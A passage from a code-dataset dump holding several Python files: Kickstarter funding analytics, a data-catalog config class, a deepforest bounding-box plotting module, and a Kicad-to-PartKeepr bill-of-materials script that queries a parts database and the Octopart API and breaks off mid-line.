Failed\"] += 1\r\n\r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 1000000:\r\n rawFundingVersusSuccessStats[\"1,000,001+ Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 1000000:\r\n rawFundingVersusSuccessStats[\"1,000,001+ Failed\"] += 1\r\n\r\n fundingVersusSuccessStats = {\r\n \"$0-$100\": round((rawFundingVersusSuccessStats[\"0-100 Success\"] / (rawFundingVersusSuccessStats[\"0-100 Success\"] + rawFundingVersusSuccessStats[\"0-100 Failed\"]) * 100), 2),\r\n \"$101-$1,000\": round((rawFundingVersusSuccessStats[\"101-1,000 Success\"] / (rawFundingVersusSuccessStats[\"101-1,000 Success\"] + rawFundingVersusSuccessStats[\"101-1,000 Failed\"]) * 100), 2),\r\n \"$1,001-$10,000\": round((rawFundingVersusSuccessStats[\"1,001-10,000 Success\"] / (rawFundingVersusSuccessStats[\"1,001-10,000 Success\"] + rawFundingVersusSuccessStats[\"1,001-10,000 Failed\"]) * 100), 2),\r\n \"$10,001-$100,000\": round((rawFundingVersusSuccessStats[\"10,001-100,000 Success\"] / (rawFundingVersusSuccessStats[\"10,001-100,000 Success\"] + 
rawFundingVersusSuccessStats[\"10,001-100,000 Failed\"]) * 100), 2),\r\n \"$100,001-$1,000,000\": round((rawFundingVersusSuccessStats[\"100,001-1,000,000 Success\"] / (rawFundingVersusSuccessStats[\"100,001-1,000,000 Success\"] + rawFundingVersusSuccessStats[\"100,001-1,000,000 Failed\"]) * 100), 2),\r\n \"$1,000,001+\": round((rawFundingVersusSuccessStats[\"1,000,001+ Success\"] / (rawFundingVersusSuccessStats[\"1,000,001+ Success\"] + rawFundingVersusSuccessStats[\"1,000,001+ Failed\"]) * 100), 2)\r\n }\r\n\r\n return fundingVersusSuccessStats\r\n\r\ndef getDeadlineStats(projectList):\r\n\r\n deadlineStats = {\r\n \"January\": 0,\r\n \"February\": 0,\r\n \"March\": 0,\r\n \"April\": 0,\r\n \"May\": 0,\r\n \"June\": 0,\r\n \"July\": 0,\r\n \"August\": 0,\r\n \"September\": 0,\r\n \"October\": 0,\r\n \"November\": 0,\r\n \"December\": 0\r\n }\r\n\r\n launchStats = {\r\n \"January\": 0,\r\n \"February\": 0,\r\n \"March\": 0,\r\n \"April\": 0,\r\n \"May\": 0,\r\n \"June\": 0,\r\n \"July\": 0,\r\n \"August\": 0,\r\n \"September\": 0,\r\n \"October\": 0,\r\n \"November\": 0,\r\n \"December\": 0\r\n }\r\n\r\n for project in projectList:\r\n deadlineDate = project[\"deadline\"].split('/')\r\n if deadlineDate[0] == '1':\r\n deadlineStats[\"January\"] += 1\r\n elif deadlineDate[0] == '2':\r\n deadlineStats[\"February\"] += 1\r\n elif deadlineDate[0] == '3':\r\n deadlineStats[\"March\"] += 1\r\n elif deadlineDate[0] == '4':\r\n deadlineStats[\"April\"] += 1\r\n elif deadlineDate[0] == '5':\r\n deadlineStats[\"May\"] += 1\r\n elif deadlineDate[0] == '6':\r\n deadlineStats[\"June\"] += 1\r\n elif deadlineDate[0] == '7':\r\n deadlineStats[\"July\"] += 1\r\n elif deadlineDate[0] == '8':\r\n deadlineStats[\"August\"] += 1\r\n elif deadlineDate[0] == '9':\r\n deadlineStats[\"September\"] += 1\r\n elif deadlineDate[0] == '10':\r\n deadlineStats[\"October\"] += 1\r\n elif deadlineDate[0] == '11':\r\n deadlineStats[\"November\"] += 1\r\n elif deadlineDate[0] == '12':\r\n deadlineStats[\"December\"] += 1\r\n\r\n launchDate = project[\"launched\"].split('/')\r\n if launchDate[0] == '1':\r\n launchStats[\"January\"] += 1\r\n elif launchDate[0] == '2':\r\n launchStats[\"February\"] += 1\r\n elif launchDate[0] == '3':\r\n launchStats[\"March\"] += 1\r\n elif launchDate[0] == '4':\r\n launchStats[\"April\"] += 1\r\n elif launchDate[0] == '5':\r\n launchStats[\"May\"] += 1\r\n elif launchDate[0] == '6':\r\n launchStats[\"June\"] += 1\r\n elif launchDate[0] == '7':\r\n launchStats[\"July\"] += 1\r\n elif launchDate[0] == '8':\r\n launchStats[\"August\"] += 1\r\n elif launchDate[0] == '9':\r\n launchStats[\"September\"] += 1\r\n elif launchDate[0] == '10':\r\n launchStats[\"October\"] += 1\r\n elif launchDate[0] == '11':\r\n launchStats[\"November\"] += 1\r\n elif launchDate[0] == '12':\r\n launchStats[\"December\"] += 1\r\n\r\n return deadlineStats, launchStats","sub_path":"src/modules/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":17918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"378843796","text":"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import *\nfrom builtins import object\n\nfrom .constants import *\n\nclass CatalogStore(object):\n debug = False\n uuid5_namespace = Constants.UUID_NAMESPACE\n agave_storage_system = Constants.CATALOG_AGAVE_STORAGE_SYSTEM\n 
agave_root_dir = Constants.CATALOG_AGAVE_ROOT_DIR\n uploads_dir = Constants.UPLOADS_ROOT\n products_dir = Constants.PRODUCTS_ROOT\n references_dir = Constants.REFERENCES_ROOT\n collections = {'updates': 'updates',\n 'fixity': 'files-fixity',\n 'files': 'files',\n 'challenges': 'challenges',\n 'experiments': 'experiments',\n 'samples': 'samples',\n 'measurements': 'measurements',\n 'pipelines': 'pipelines',\n 'jobs': 'jobs',\n 'tokens': 'tokens',\n 'products_files': 'products_files',\n 'products_files_fixity': 'products_files_fixity',\n 'inputs_files': 'inputs_files',\n 'inputs_files_fixity': 'inputs_files_fixity'}\n batch = 1000\n mongodb = {'host': 'catalog.sd2e.org',\n 'port': '27020', 'username': None,\n 'password': None, 'replica_set': None}\n","sub_path":"datacatalog/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"650081918","text":"# Visualize module for plotting and handling predictions\nimport os\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom skimage import io\nimport numpy as np\n\ndef format_boxes(prediction, scores=True):\n \"\"\"Format a retinanet prediction into a pandas dataframe for a single image\n Args:\n prediction: a dictionary with keys 'boxes' and 'labels' coming from a retinanet\n scores: Whether boxes come with scores, during prediction, or without scores, as in during training.\n Returns:\n df: a pandas dataframe\n \"\"\"\n\n df = pd.DataFrame(prediction[\"boxes\"].cpu().detach().numpy(),\n columns=[\"xmin\", \"ymin\", \"xmax\", \"ymax\"])\n df[\"label\"] = prediction[\"labels\"].cpu().detach().numpy()\n\n if scores:\n df[\"score\"] = prediction[\"scores\"].cpu().detach().numpy()\n\n return df\n\n\ndef plot_prediction_and_targets(image, predictions, targets, image_name, savedir):\n \"\"\"Plot an image, its predictions, and its ground truth targets for debugging\"\"\"\n prediction_df = format_boxes(predictions)\n plot, ax = plot_predictions(image, prediction_df)\n target_df = format_boxes(targets, scores=False)\n plot = add_annotations(plot, ax, target_df)\n plot.savefig(\"{}/{}.png\".format(savedir, image_name), dpi=300)\n return \"{}/{}.png\".format(savedir, image_name)\n\n\ndef plot_prediction_dataframe(df, root_dir, ground_truth=None, savedir=None, show=False):\n \"\"\"For each row in dataframe, call plot predictions. For multi-class labels, boxes will be colored by labels. 
Ground truth boxes will all be the same color, regardless of class.\n Args:\n df: a pandas dataframe with image_path, xmin, xmax, ymin, ymax and label columns\n root_dir: relative dir to look for image names from df.image_path\n ground_truth: an optional pandas dataframe in same format as df holding ground_truth boxes\n savedir: save the plot to an optional directory path.\n show (logical): Render the plot in the matplotlib GUI\n Returns:\n None: side-effect plots are saved or generated and viewed\n \"\"\"\n for name, group in df.groupby(\"image_path\"):\n image = io.imread(\"{}/{}\".format(root_dir, name))\n plot, ax = plot_predictions(image, group, show=show)\n \n if ground_truth is not None:\n annotations = ground_truth[ground_truth.image_path == name]\n plot = add_annotations(plot, ax, annotations)\n \n if savedir:\n plot.savefig(\"{}/{}.png\".format(savedir, os.path.splitext(name)[0]))\n \n\ndef plot_predictions(image, df, show=False):\n \"\"\"Plot predicted boxes onto a channels-last (H, W, C) image array.\n By default this function does not show the plot; it only draws onto an axis.\n \"\"\"\n if not show:\n original_backend = matplotlib.get_backend()\n matplotlib.use(\"Agg\")\n \n #Create a numeric index for coloring\n df['numeric'] = df['label'].astype('category').cat.codes\n\n #What size does the figure need to be in inches to fit the image?\n dpi=300\n height, width, nbands = image.shape\n figsize = width / float(dpi), height / float(dpi)\n\n fig, ax = plt.subplots(figsize=figsize)\n ax.imshow(image)\n for index, row in df.iterrows():\n xmin = row[\"xmin\"]\n ymin = row[\"ymin\"]\n width = row[\"xmax\"] - xmin\n height = row[\"ymax\"] - ymin\n color = label_to_color(row[\"numeric\"])\n rect = create_box(xmin=xmin, ymin=ymin, height=height, width=width, color=color)\n ax.add_patch(rect)\n # hide the axes\n plt.axis('off')\n \n # restore the user's original matplotlib backend\n if not show:\n matplotlib.use(original_backend)\n \n return fig, ax\n\n\ndef create_box(xmin, ymin, height, width, color=\"cyan\", linewidth=0.5):\n rect = patches.Rectangle((xmin, ymin),\n height,\n width,\n linewidth=linewidth,\n edgecolor=color,\n fill=False)\n return rect\n\n\ndef add_annotations(plot, ax, annotations):\n \"\"\"Add ground truth annotations to a figure created by visualize.plot_predictions\n Args:\n plot: matplotlib figure object\n ax: matplotlib axes object\n annotations: pandas dataframe of bounding box annotations\n Returns:\n plot: matplotlib figure object\n \"\"\"\n for index, row in annotations.iterrows():\n xmin = row[\"xmin\"]\n ymin = row[\"ymin\"]\n width = row[\"xmax\"] - xmin\n height = row[\"ymax\"] - ymin\n rect = create_box(xmin=xmin,\n ymin=ymin,\n height=height,\n width=width,\n color=\"orange\")\n ax.add_patch(rect)\n\n return plot\n\n\ndef label_to_color(label):\n color_dict = {}\n colors = [\n list((matplotlib.colors.hsv_to_rgb([x, 1.0, 1.0])).astype(int))\n for x in np.arange(0, 1, 1.0 / 80)\n ]\n for index, color in enumerate(colors):\n color_dict[index] = color\n\n # hand pick the first few colors\n color_dict[0] = \"cyan\"\n color_dict[1] = \"tomato\"\n color_dict[2] = \"blue\"\n color_dict[3] = \"limegreen\"\n color_dict[4] = \"orchid\"\n color_dict[5] = \"crimson\"\n color_dict[6] = \"peru\"\n color_dict[7] = \"dodgerblue\"\n color_dict[8] = \"gold\"\n color_dict[9] = \"blueviolet\"\n\n return color_dict[label]\n
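\n\n# (reviewer sketch) typical flow with the helpers above, assuming a retinanet\n# prediction dict and an (H, W, 3) numpy image array:\n#   df = format_boxes(prediction)\n#   fig, ax = plot_predictions(image, df)\n#   fig.savefig(\"predictions.png\", dpi=300)\n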
","sub_path":"deepforest/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"456168650","text":"#!/usr/bin/env python3\n# coding=utf-8\n\n# TODO: Put all CSS into single external stylesheet [partially done]\n# TODO: Split html write headers / intro etc into separate project\n\n\nimport csv\nimport decimal\nimport json\nimport os\nimport re\nimport subprocess\nimport sys\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nimport webbrowser\nfrom datetime import datetime\nfrom pprint import pprint\n\nimport requests\n\nfrom currency_converter import CurrencyConverter\nfrom json2html import *\nfrom K2PKConfig import *\nfrom mysql.connector import Error, MySQLConnection\n\n# NOTE: Set precision to cope with nano, pico & giga multipliers.\nctx = decimal.Context()\nctx.prec = 12\n\n\nfile_name = sys.argv[1]\nprojectName, ext = file_name.split(\".\")\nprint(projectName)\n\n# Make baseline barcodes and web directories\ntry:\n os.makedirs('./assets/barcodes')\nexcept OSError:\n pass\n\ntry:\n os.makedirs('./assets/web')\nexcept OSError:\n pass\n\ninvalidate_BOM_Cost = False\n\ntry:\n distribConfig = read_distributors_config()\n preferred = (distribConfig['preferred'])\nexcept KeyError:\n print('No preferred distributors in config.ini')\n pass\n\n\ndef float_to_str(f):\n d1 = ctx.create_decimal(repr(f))\n return format(d1, 'f')\n\n\ndef convert_units(num):\n factors = [\"G\", \"M\", \"K\", \"k\", \"R\", \"\", \".\", \"m\", \"u\", \"n\", \"p\"]\n conversion = {\n 'G': '1000000000',\n 'M': '1000000',\n 'K': '1000',\n 'k': '1000',\n 'R': '1',\n '.': '1',\n '': '1',\n 'm': '0.001',\n \"u\": '0.000001',\n 'n': '0.000000001',\n 'p': '0.000000000001'}\n val = \"\"\n mult = \"\"\n\n for i in range(len(num)):\n if num[i] == \".\":\n mult = num[i]\n if num[i] in factors:\n mult = num[i]\n val = val + \".\"\n else:\n if num[i].isdigit():\n val = val + (num[i])\n else:\n print(\"Invalid multiplier\")\n return(\"0\")\n break\n if val.endswith(\".\"):\n val = val[:-1]\n m = float(conversion[mult])\n v = float(val)\n r = float_to_str(m * v)\n\n r = r.rstrip(\"0\")\n r = r.rstrip(\".\")\n return(r)\n\n\n
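# (reviewer note) convert_units expands the usual R/C multiplier shorthand, e.g.\n#   convert_units(\"4k7\")  -> \"4700\"\n#   convert_units(\"2M2\")  -> \"2200000\"\n#   convert_units(\"100n\") -> \"0.0000001\"\n\n\n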
def partStatus(partID, parameter):\n dbconfig = read_db_config()\n try:\n conn = MySQLConnection(**dbconfig)\n cursor = conn.cursor()\n sql = \"SELECT R.stringValue FROM PartParameter R WHERE (R.name = '{}') AND (R.part_id = {})\".format(\n parameter, partID)\n cursor.execute(sql)\n partStatus = cursor.fetchall()\n\n if partStatus == []:\n part = \"Unknown\"\n else:\n part = str(partStatus[0])[2:-3]\n return (part)\n\n except UnicodeEncodeError as err:\n print(err)\n\n finally:\n cursor.close()\n conn.close()\n\n\ndef getDistrib(partID):\n\n dbconfig = read_db_config()\n try:\n conn = MySQLConnection(**dbconfig)\n cursor = conn.cursor()\n sql = \"\"\"SELECT D.name, PD.sku, D.skuurl FROM Distributor D\n\t\t\t\tLEFT JOIN PartDistributor PD on D.id = PD.distributor_id\n\t\t\t\tWHERE PD.part_id = {}\"\"\".format(partID)\n cursor.execute(sql)\n distributors = cursor.fetchall()\n unique = []\n d = []\n distributor = []\n\n for distributor in distributors:\n if distributor[0] not in unique and distributor[0] in preferred:\n unique.append(distributor[0])\n d.append(distributor)\n return(d)\n\n except UnicodeEncodeError as err:\n print(err)\n\n finally:\n cursor.close()\n conn.close()\n\n\ndef octopartLookup(partIn, bean):\n\n try:\n octoConfig = read_octopart_config()\n apikey = (octoConfig['apikey'])\n except KeyError:\n print('No Octopart API key in config.ini')\n return (2)\n\n try:\n currencyConfig = read_currency_config()\n locale = (currencyConfig['currency'])\n except KeyError:\n print(\"No currency configured in config.ini\")\n return(4)\n\n # Get currency rates from European Central Bank\n # Fall back on cached rates\n try:\n c = CurrencyConverter(\n 'http://www.ecb.europa.eu/stats/eurofxref/eurofxref.zip')\n except Exception:\n # could not fetch fresh rates; carry on with the cached ones\n c = CurrencyConverter()\n\n web = str(\"./assets/web/\" + partIn + \".html\")\n\n webpage = open(web, \"w\")\n\n # Replace spaces in part name with asterisk for 'wildcard' search\n\n Part = partIn.replace(\" \", \"*\")\n\n aside = open(\"./assets/web/tmp.html\", \"w\")\n\n htmlHeader = \"\"\"\n \n \n \n \n \n \n Octopart Lookup\n \n \n \n \n\n \n \n \n\n \n \n \n\n \n 
\n

Kicad2PartKeepr

\n
\n
\n
\n
    \n
\n
\n
\n \"\"\"\n\n webpage.write(htmlHeader)\n\n ##################\n bean = False\n # FIXME: Treat 'bean' devices separately - use 'search' API not 'match'\n # FIXME: Search only for Non_PK parts in first instance.\n ##################\n\n if bean:\n #\n url = \"http://octopart.com/api/v3/parts/search\"\n url += '?apikey=' + apikey\n url += '&q=\"' + Part + '\"'\n url += '&include[]=descriptions'\n # url += '&include[]=imagesets'\n # url += '&include[]=specs'\n # url += '&include[]=datasheets'\n url += '&country=GB'\n data = urllib.request.urlopen(url).read()\n response = json.loads(data)\n pprint(response)\n else:\n url = \"http://octopart.com/api/v3/parts/match\"\n url += '?apikey=' + apikey\n url += '&queries=[{\"mpn\":\"' + Part + '\"}]'\n url += '&include[]=descriptions'\n url += '&include[]=imagesets'\n url += '&include[]=specs'\n url += '&include[]=datasheets'\n url += '&country=GB'\n\n data = urllib.request.urlopen(url).read()\n response = json.loads(data)\n\n loop = False\n\n for result in response['results']:\n for item in result['items']:\n if loop:\n break\n loop = True\n\n partNum = item['mpn']\n\n try:\n description = str(item['descriptions'][0].get('value', None))\n except:\n IndexError\n description = \"\"\n\n webpage.write(\n \"

\" +\n partNum +\n \"

\" +\n description +\n \"



\")\n\n # Get image (if present). Also need to get attribution for Octopart licensing\n try:\n image = str(item['imagesets'][0]\n ['medium_image'].get('url', None))\n except:\n IndexError\n image = \"\"\n\n try:\n credit = str(item['imagesets'][0].get('credit_string', None))\n except:\n IndexError\n credit = \"\"\n\n aside.write(\"
Image credit: \" + credit + \"


\")\n aside.write(\"\")\n\n for spec in item['specs']:\n parm = item['specs'][spec]['metadata']['name']\n try:\n if type(item['specs'][spec]['display_value']):\n val = str(item['specs'][spec]['display_value'])\n except:\n IndexError\n val = \"Not Listed by Manufacturer\"\n\n parameter = ((\"{:30} \").format(parm))\n value = ((\"{:40}\").format(val))\n# print(parameter, \" : \", value)\n print((\"| {:30} : {:124} |\").format(parameter, value))\n aside.write(\n \"\")\n print(('{:_<162}').format(\"\"))\n\n aside.write(\"
CharacteristicValue
\" +\n parameter +\n \"\" +\n value +\n \"
\")\n aside.write(\n \"\")\n\n for datasheet in item['datasheets']:\n try:\n if (datasheet['metadata']['last_updated']):\n dateUpdated = (datasheet['metadata']\n ['last_updated'])[:10]\n else:\n dateUpdated = \"Unknown\"\n except:\n IndexError\n dateUpdated = \"Unknown\"\n\n if datasheet['attribution']['sources'] is None:\n source = \"Unknown\"\n else:\n source = datasheet['attribution']['sources'][0]['name']\n\n numPages = str(datasheet['metadata']['num_pages'])\n documents = (\n (\"| {:30} {:11} {:12} {:7} {:7} {:1} {:84} |\").format(\n source,\n \" Updated: \",\n dateUpdated,\n \"Pages: \",\n numPages, \"\", datasheet['url']))\n print(documents)\n aside.write(\n \"\")\n if loop:\n webpage.write(\"
DatasheetsDatePages
\" +\n source +\n \" \" +\n dateUpdated +\n \"\" +\n numPages +\n \"
\")\n else:\n webpage.write(\"

No Octopart results found

\")\n\n # Header row here\n\n webpage.write(\"\")\n count = 0\n\n for result in response['results']:\n\n for item in result['items']:\n if count == 0:\n print(('{:_<162}').format(\"\"))\n print((\"| {:24} | {:19} | {:>9} | {:>7} | {:11} | {:5} \").format(\n \"Seller\", \"SKU\", \"Stock\", \"MOQ\", \"Package\", \"Currency\"), end=\"\")\n print(\n (\"| {:>10}| {:>10}| {:>10}| {:>10}| {:>10}|\").format(\n \"1\",\n \"10\",\n \"100\",\n \"1000\",\n \"10000\"))\n print(('{:-<162}').format(\"\"), end=\"\")\n count += 1\n\n # Breaks at 1, 10, 100, 1000, 10000\n for offer in item['offers']:\n loop = 0\n _seller = offer['seller']['name']\n _sku = (offer['sku'])[:19]\n _stock = offer['in_stock_quantity']\n _moq = str(offer['moq'])\n\n if _moq == \"None\":\n _moq = '-'\n _package = str(offer['packaging'])\n\n if _package == \"None\":\n _package = \"-\"\n\n print()\n\n print((\"| {:24} | {:19} | {:>9} | {:>7} | {:11} |\").format(\n _seller, _sku, _stock, _moq, _package), end=\"\")\n line = \"\"\n webpage.write(line)\n\n valid = False\n points = ['-', '-', '-', '-', '-']\n for currency in offer['prices']:\n # Some Sellers don't have currency so use this to fill the line\n valid = True\n\n if currency == locale:\n # Base currency is local\n loop += 1\n if loop == 1:\n print((\" {:3} |\").format(currency), end=\"\")\n webpage.write(\"\")\n else:\n # Only try and convert first currency\n loop += 1\n if loop == 1:\n print((\" {:3}* |\").format(locale), end=\"\")\n webpage.write(\"\")\n\n if loop == 1:\n\n for breaks in offer['prices'][currency]:\n\n _moqv = offer['moq']\n if _moqv is None:\n _moqv = 1\n _moqv = int(_moqv)\n i = 0\n\n # Break 0 - 9\n if breaks[0] < 10:\n points[0] = round(\n c.convert(breaks[1], currency, locale), 2)\n # if _moqv >= breaks[0]:\n # Propogate right\n for i in range(0, 4):\n points[i + 1] = points[i]\n\n # Break 10 to 99\n if breaks[0] >= 10 and breaks[0] < 100:\n points[1] = round(\n c.convert(breaks[1], currency, locale), 3)\n # if _moqv >= breaks[0]:\n for i in range(1, 4):\n points[i + 1] = points[i]\n\n # Break 100 to 999\n if breaks[0] >= 100 and breaks[0] < 1000:\n points[2] = round(\n c.convert(breaks[1], currency, locale), 4)\n # if _moqv >= breaks[0]:\n for i in range(2, 4):\n points[i + 1] = points[i]\n\n # Break 1000 to 9999\n if breaks[0] >= 1000 and breaks[0] < 10000:\n points[3] = round(\n c.convert(breaks[1], currency, locale), 5)\n# if _moqv >= breaks[0]:\n points[4] = points[3]\n\n # Break 10000+\n if breaks[0] >= 10000:\n points[4] = round(\n c.convert(\n breaks[1],\n currency,\n locale),\n 6)\n else:\n points[4] = points[3]\n\n for i in range(0, 5):\n print((\" {:>10.5}|\").format(points[i]), end=\"\")\n webpage.write(\"\")\n webpage.write(\"\")\n if not valid:\n print(\" |\", end=\"\")\n webpage.write(\"\")\n for i in range(0, 5):\n print((\" {:>10.5}|\").format(points[i]), end=\"\")\n webpage.write(\"\")\n webpage.write(\"\")\n valid = False\n webpage.write(\"
SellerSKUStockMOQPackageCurrency110100100010000
\" + _seller + \"\" + str(\n offer['sku']) + \"\" + str(_stock) + \"\" + str(_moq) + \"\" + _package + \"\" + currency + \"\" + locale + \"*\" + str(points[i]) + \"
\" + str(points[i]) + \"
\")\n print()\n print(('{:=<162}').format(\"\"))\n\n aside.close()\n side = open(\"./assets/web/tmp.html\", \"r\")\n\n aside = side.read()\n\n webpage.write(aside + \"\")\n webpage.write(\n \"
\")\n return\n\n################################################################################\n# Further setup or web configuration here\n#\n#\n################################################################################\n\n\ncompliance = {\n 'Compliant': 'assets/img/ROHS_GREEN.png',\n 'Non-Compliant': 'assets/img/ROHS_RED.png',\n 'Unknown': 'assets/img/ROHS_BLACK.png'\n}\n\nmanufacturing = {\n 'Obsolete': 'assets/img/FACTORY_RED.png',\n 'Not Recommended for New Designs': 'assets/img/FACTORY_YELLOW.png',\n 'Unknown': 'assets/img/FACTORY_BLUE.png',\n 'Active': 'assets/img/FACTORY_GREEN.png',\n 'Not Listed by Manufacturer': 'assets/img/FACTORY_PURPLE.png'\n}\n\ndateBOM = datetime.now().strftime('%Y-%m-%d')\ntimeBOM = datetime.now().strftime('%H:%M:%S')\n\nrun = 0\nweb = open(\"assets/web/temp.html\", \"w\")\npicklist = open(\"assets/web/picklist.html\", \"w\")\nlabels = open(\"assets/web/labels.html\", \"w\")\naccounting = open(\"assets/web/accounting.html\", \"w\")\nmissing = open(\"assets/web/missing.csv\", \"w\")\nunder = open(\"assets/web/under.csv\", \"w\")\nunder.write('Name,Description,Quantity,Stock,Min Stock\\n')\n\nhtmlHeader = \"\"\"\n\n\n\n\n\nKicad 2 PartKeepr\n\n\n
\n

Kicad2PartKeepr

\n
\n \n\n

\n


  Project name: \"\"\" + projectName + \\\n \"


  Date:\\t\" + dateBOM + \\\n \"

\\n


  Time:\\t\" + timeBOM + \"

\"\n\n\nhtmlBodyHeader = \"\"\"\n

\n\n\"\"\"\n\npicklistHeader = \"\"\"\n\n\n\n\nPicklist\n\n\n\n

Picklist

\\n

Project name: \"\"\"\n\npick2 = projectName + \"

\" + dateBOM + \"

\\n

\" + timeBOM + \"

\"\n\npicklist.write(picklistHeader + pick2 + \"
\")\n\n\nlabel_header = \"\"\"\n\n\n\n\nKicad to PartKeepr\n\n\n\n
\n\"\"\"\n\nlabels.write(label_header)\nlabel_cnt = 0\n\n\nhtmlAccountingHeader = \"\"\"\n
\n\"\"\"\n\n\nresistors = [\"R_1206\", \"R_0805\", \"R_0603\", \"R_0402\"]\ncapacitors = [\"C_1206\", \"C_0805\", \"C_0603\", \"C_0402\"]\n\n\ndef punctuate(value):\n if \".\" in value:\n multiplier = (value.strip()[-1])\n new_string = \"_\" + (re.sub(\"\\.\", multiplier, value))[:-1]\n else:\n new_string = \"_\" + value\n return(new_string)\n\n\ndef get_choice(possible):\n print(\"More than one component in the PartKeepr database meets the criteria:\")\n i = 1\n for name, description, stockLevel, minStockLevel, averagePrice, partNum, storage_locn, PKid, Manufacturer in possible:\n print(i, \" : \", name, \" : \", description)\n# subprocess.call(['/usr/local/bin/pyparts', 'specs', name])\n i = i + 1\n print(\"Choose which component to add to BOM (or 0 to defer)\")\n\n while True:\n choice = int(input('>'))\n if choice == 0:\n return (possible)\n if choice < 0 or choice > len(possible):\n continue\n break\n\n i = 1\n for name, description, stockLevel, minStockLevel, averagePrice, partNum, storage_locn, PKid, Manufacturer in possible:\n possible = (name, description, stockLevel, minStockLevel,\n averagePrice, partNum, storage_locn, PKid, Manufacturer)\n if i == choice:\n possible = (name, description, stockLevel, minStockLevel,\n averagePrice, partNum, storage_locn, PKid, Manufacturer)\n print(\"Selected :\")\n print(possible[0], \" : \", possible[1])\n return [possible]\n i = i + 1\n\n\ndef find_part(part_num):\n\n dbconfig = read_db_config()\n\n try:\n conn = MySQLConnection(**dbconfig)\n cursor = conn.cursor()\n\n bean = False\n\n if (part_num[:6]) in resistors:\n quality = \"Resistance\"\n variant = \"Resistance Tolerance\"\n bean = True\n if (part_num[:6]) in capacitors:\n quality = \"Capacitance\"\n variant = \"Dielectric Characteristic\"\n bean = True\n\n if (bean):\n component = part_num.split('_')\n\n if (len(component)) <= 2:\n print(\"Insufficient parameters (Needs 3 or 4) e.g. 
R_0805_100K(_±5%)\")\n return (\"0\")\n\n c_case = component[1]\n c_value = convert_units(component[2])\n\n if (len(component)) == 4:\n c_characteristics = component[3]\n\n # A fully specified 'bean'\n sql = \"\"\"SELECT P.name, P.description, P.stockLevel, P.minStockLevel, P.averagePrice, P.internalPartNumber, S.name, P.id, M.name\n FROM Part P\n JOIN PartParameter R ON R.part_id = P.id\n JOIN StorageLocation S ON S.id = P.storageLocation_id\n LEFT JOIN PartManufacturer PM on PM.part_id = P.id\n LEFT JOIN Manufacturer M on M.id = PM.manufacturer_id\n WHERE\n (R.name = 'Case/Package' AND R.stringValue='{}') OR\n (R.name = '{}' AND R.normalizedValue = '{}') OR\n (R.name = '{}' AND R.stringValue = '%{}')\n GROUP BY P.id, M.id, S.id\n HAVING\n COUNT(DISTINCT R.name)=3\"\"\".format(\n c_case, quality, c_value, variant, c_characteristics)\n else:\n # A partially specified 'bean'\n sql = \"\"\"SELECT P.name, P.description, P.stockLevel, P.minStockLevel, P.averagePrice, P.internalPartNumber, S.name, P.id, M.name\n FROM Part P\n JOIN PartParameter R ON R.part_id = P.id\n JOIN StorageLocation S ON S.id = P.storageLocation_id\n LEFT JOIN PartManufacturer PM on PM.part_id = P.id\n LEFT JOIN Manufacturer M on M.id = PM.manufacturer_id\n WHERE\n (R.name = 'Case/Package' AND R.stringValue='{}') OR\n (R.name = '{}' AND R.normalizedValue = '{}')\n GROUP BY P.id, M.id, S.id\n HAVING\n COUNT(DISTINCT R.name)=2\"\"\".format(\n c_case, quality, c_value)\n else:\n\n sql = \"\"\"SELECT P.name, P.description, P.stockLevel, P.minStockLevel, P.averagePrice, P.internalPartNumber, S.name, P.id, M.name\n FROM Part P\n JOIN StorageLocation S ON S.id = P.storageLocation_id\n LEFT JOIN PartManufacturer PM on PM.part_id = P.id\n LEFT JOIN Manufacturer M on M.id = PM.manufacturer_id\n WHERE P.name LIKE '%{}%'\"\"\".format(part_num)\n\n cursor.execute(sql)\n components = cursor.fetchall()\n return (components, bean)\n\n except UnicodeEncodeError as err:\n print(err)\n\n finally:\n cursor.close()\n conn.close()\n\n\n###############################################################################\n#\n# Main part of program follows\n#\n#\n###############################################################################\n\n\nwith open(file_name, newline='', encoding='utf-8') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n headers = reader.fieldnames\n\n filename, file_extension = os.path.splitext(file_name)\n\n outfile = open(\"./assets/web/\" + filename + '_PK.csv',\n 'w', newline='\\n', encoding='utf-8')\n writeCSV = csv.writer(outfile, delimiter=',')\n\n# Initialise accounting values\n countParts = 0\n count_BOMLine = 0\n count_NPKP = 0\n count_PKP = 0\n count_LowStockLines = 0\n count_PWP = 0\n bomCost = 0\n\n for row in reader:\n if not row:\n break\n new_string = \"\"\n part = row['Part#']\n value = row['Value']\n footprint = row['Footprint']\n datasheet = row['Datasheet']\n characteristics = row['Characteristics']\n references = row['References']\n quantity = row['Quantity Per PCB']\n # Need sufficient info to process. 
Some .csv reprocessing adds in lines\n # of NULL placeholders where there was a blank line.\n if part == \"\" and value == \"\" and footprint == \"\":\n break\n\n count_BOMLine = count_BOMLine + 1\n\n if footprint in resistors:\n if value.endswith(\"Ω\"): # Remove trailing 'Ω' (Ohms)\n value = (value[:-1])\n new_string = punctuate(value)\n\n if footprint in capacitors:\n if value.endswith(\"F\"): # Remove trailing 'F' (Farads)\n value = (value[:-1])\n new_string = punctuate(value)\n\n if characteristics is None:\n if characteristics != \"-\":\n new_string = new_string + \"_\" + str(characteristics)\n\n if part == \"-\":\n part = (str(footprint) + new_string)\n\n if references is None:\n break\n\n component_info, species = find_part(part)\n\n n_components = len(component_info)\n\n quantity = int(quantity)\n\n# Print to screen - these could all do with neatening up...\n print(('{:=<162}').format(\"\"))\n print((\"| BOM Line number : {:3} {:136} |\").format(count_BOMLine, \"\"))\n # print(\"| BOM Line number : \", count_BOMLine)\n\n print(('{:_<162}').format(\"\"))\n print(\n (\"| {:100} | {:13.13} | | Req = 